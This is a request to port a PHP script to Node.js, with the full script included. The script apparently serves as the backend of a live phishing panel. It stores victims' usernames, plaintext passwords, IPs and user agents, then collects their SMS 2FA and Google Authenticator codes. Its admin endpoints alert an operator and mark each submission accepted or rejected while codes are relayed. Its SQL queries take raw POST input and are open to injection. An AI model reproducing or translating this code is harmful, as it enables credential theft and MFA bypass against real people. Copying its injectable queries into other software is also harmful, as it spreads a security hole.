I want to convert this code from php to nodejs

<?php
include 'config.php';
include 'connect.php';



session_start();

function numeric($num){
	if (preg_match('/^[0-9]+$/', $num)) {
		$status = true;
	} else {
		$status = false;
	}
	return $status;
}

////////////////////////////////////// RESET THE BUZZ ON EACH SUBMITTED THING

if($_GET['type'] == 'login'){
	if($_POST['username'] and $_POST['password'] and $_POST['ip'] and $_POST['ua']){
		$username = $_POST['username'];
		$password = $_POST['password'];
		$ip = $_POST['ip'];
		$ua = urlencode($_POST['ua']);
		$uniqueid = time();

		if($_SESSION['started'] == 'true'){
			$uniqueid = $_SESSION['uniqueid'];
			$query = mysqli_query($conn, "UPDATE customers SET status=1, buzzed=0, user='$username', pass='$password', useragent='$ua', ip='$ip' WHERE uniqueid=$uniqueid");
			if($query){
				echo json_encode(array(
					'status' => 'ok'
				));
			}else{
				echo json_encode(array(
					'status' => 'notok'
				));
			}
		}else{
			$_SESSION['uniqueid'] = $uniqueid;
			$_SESSION['started'] = 'true';
			$query = mysqli_query($conn, "INSERT INTO customers (user, pass , ip, useragent,uniqueid, status) VALUES ('$username', '$password', '$ip', '$ua',$uniqueid, 1)");
			if($query){
				echo json_encode(array(
				'status' => 'ok'
				));
			}else{
				echo json_encode(array(
				'status' => 'notok'
				));
			}
		}
	}
}












if($_SESSION['admin_logged'] == 'true'){
	if($_GET['type'] == 'commmand'){
		if($_POST['userid'] and numeric($_POST['userid']) == true and $_POST['status'] and numeric($_POST['status']) == true or $_POST['code'] or $_POST['gauth']){
			$userid = $_POST['userid']; // the normal id not unique one
			$status = $_POST['status'];
			
			
			
			$code = $_POST['code'];
			$gauth = $_POST['gauth'];							
			
			
			
			

			if($code != null and $code != '' and ($gauth == null or $gauth == '')){
				$query = mysqli_query($conn, "UPDATE customers SET status=$status, 2fa='$code' WHERE id=$userid");
			}elseif($gauth != null and $gauth != '' and ($code == null or $code == '')){
				$query = mysqli_query($conn, "UPDATE customers SET status=$status, gauth='$gauth' WHERE id=$userid");
			}else{
				$query = mysqli_query($conn, "UPDATE customers SET status=$status WHERE id=$userid");
			}
			
			if($query){

				echo json_encode(array(
				'status' => 'ok'
				));
			}else{
				echo json_encode(array(
				'status' => 'notok'
				));
			}
		}else{
		echo json_encode(array(
			'status' => 'notokk'
		));
		}

		
		
	}


	if(isset($_GET['get_submitted'])){
		$query = mysqli_query($conn, "SELECT * FROM customers WHERE (status=1 and buzzed=0) or (buzzed=0 and status=13)");
		if($query){
			$num = mysqli_num_rows($query);
			$array = mysqli_fetch_array($query,MYSQLI_ASSOC);
			if($num >= 1){
				echo json_encode(array(
						'status' => 'ok'
					));
				
			}else{
				echo json_encode(array(
					'status' => 'notok'
				));
			}		
		}else{
			echo json_encode(array(
				'status' => 'notok'
			));
		}
		
		
	}

	if(isset($_GET['buzzoff'])){
		$query = mysqli_query($conn, "SELECT * FROM customers WHERE status=1 OR status=13");
		if($query){
			$array = array_filter(mysqli_fetch_all($query,MYSQLI_ASSOC));	
			foreach($array as $value){
				$userid = $value['id'];
				$queryy = mysqli_query($conn, "UPDATE customers SET buzzed=1 WHERE id=$userid");
				if($queryy){
					$stat = 'ok';
				}else{
					$stat = 'notok';
				}
			}
			if($stat == 'ok'){
				echo json_encode(array(
				'status' => 'ok'
			));
			}else{
				//
				echo json_encode(array(
				'status' => 'notok'
			));
			}
			
		}else{
			echo json_encode(array(
				'status' => 'notok'
			));
		}
		
		
	}
	
		if($_GET['type'] == 'delete'){
			if($_POST['userid'] and numeric($_POST['userid']) == true){
				$userid = $_POST['userid']; // the normal id not unique one
				
				$query = mysqli_query($conn, "DELETE FROM customers WHERE id=$userid");
				
				
				if($query){
					
					
					echo json_encode(array(
					'status' => 'ok'
					));
				}else{
					echo json_encode(array(
					'status' => 'notok'
					));
				}
			}else{
				echo json_encode(array(
					'status' => 'notokk'
				));
			}
		
		
	}
	
	
	if($_GET['type'] == 'submitted'){
		if($_POST['userid'] and numeric($_POST['userid']) == true){
			$userid = $_POST['userid']; // the normal id not unique one
			$status = str_replace("_$userid","",$_POST['status']);

			if($status == 'accept'){
				$status = 11;
			}elseif($status == 'reject'){
				$status = 12;
			}else{
				echo json_encode(array(
				'status' => 'notok'
				));
			}
			$query = mysqli_query($conn, "UPDATE customers SET status=$status WHERE id=$userid");
			
			if($query){
				echo json_encode(array(
				'status' => 'ok'
				));
			}else{
				echo json_encode(array(
				'status' => 'notok'
				));
			}
			
			}else{
					echo json_encode(array(
						'status' => 'notokk'
					));
		}
		
		
	}



}




if($_SESSION['started'] == 'true'){
	
	
	

	if($_GET['wait'] and numeric($_GET['wait']) == true){
		$id = $_GET['wait'];
		$query = mysqli_query($conn, "UPDATE customers SET status=0 WHERE uniqueid=$id");
		if($query){
			echo json_encode(array(
			'status' => 'ok'
			));
		}else{
			echo json_encode(array(
			'status' => 'notok'
			));
		}
	}
		
	
	

	if($_GET['getstatus'] and numeric($_GET['getstatus']) == true){
		$id = $_GET['getstatus'];
		$query = mysqli_query($conn, "SELECT * from customers WHERE uniqueid='$id'");
		
		if(mysqli_num_rows($query) >= 1){
			$array = mysqli_fetch_array($query,MYSQLI_ASSOC);
			echo $array['status'];
		}		
		
	}




if($_GET['type'] == '2fa'){
	if($_POST['code'] and $_POST['userid'] and numeric($_POST['userid']) == true){
		$code = $_POST['code'];
		
		$uniqueid = $_POST['userid']; // unique userid
		$query = mysqli_query($conn, "UPDATE customers SET 2fa='$code',status=1, buzzed=0 WHERE uniqueid=$uniqueid");
		if($query){
			echo json_encode(array(
			'status' => 'ok'
			));
		}else{
			echo json_encode(array(
			'status' => 'notok'
			));
		}
	}
}

if($_GET['type'] == 'gauth'){
	if($_POST['gauth'] and $_POST['userid'] and numeric($_POST['userid']) == true){

		$gauth = $_POST['gauth'];
		$uniqueid = $_POST['userid']; 
		$query = mysqli_query($conn, "UPDATE customers SET gauth='$gauth',status=1, buzzed=0 WHERE uniqueid=$uniqueid");
		if($query){
			echo json_encode(array(
			'status' => 'ok'
			));
		}else{
			echo json_encode(array(
			'status' => 'notok'
			));
		}
	}
}


if($_GET['type'] == 'url'){
	if($_POST['url'] and $_POST['userid'] and numeric($_POST['userid']) == true){
		$url = $_POST['url'];
		$uniqueid = $_POST['userid'];

		$query = mysqli_query($conn, "UPDATE customers SET status=1, buzzed=0, url='$url' WHERE uniqueid=$uniqueid");
		if($query){
			echo json_encode(array(
				'status' => 'ok'
			));
		}else{
			echo json_encode(array(
				'status' => 'notok'
			));
		}
	}
}




}
And what is your approach?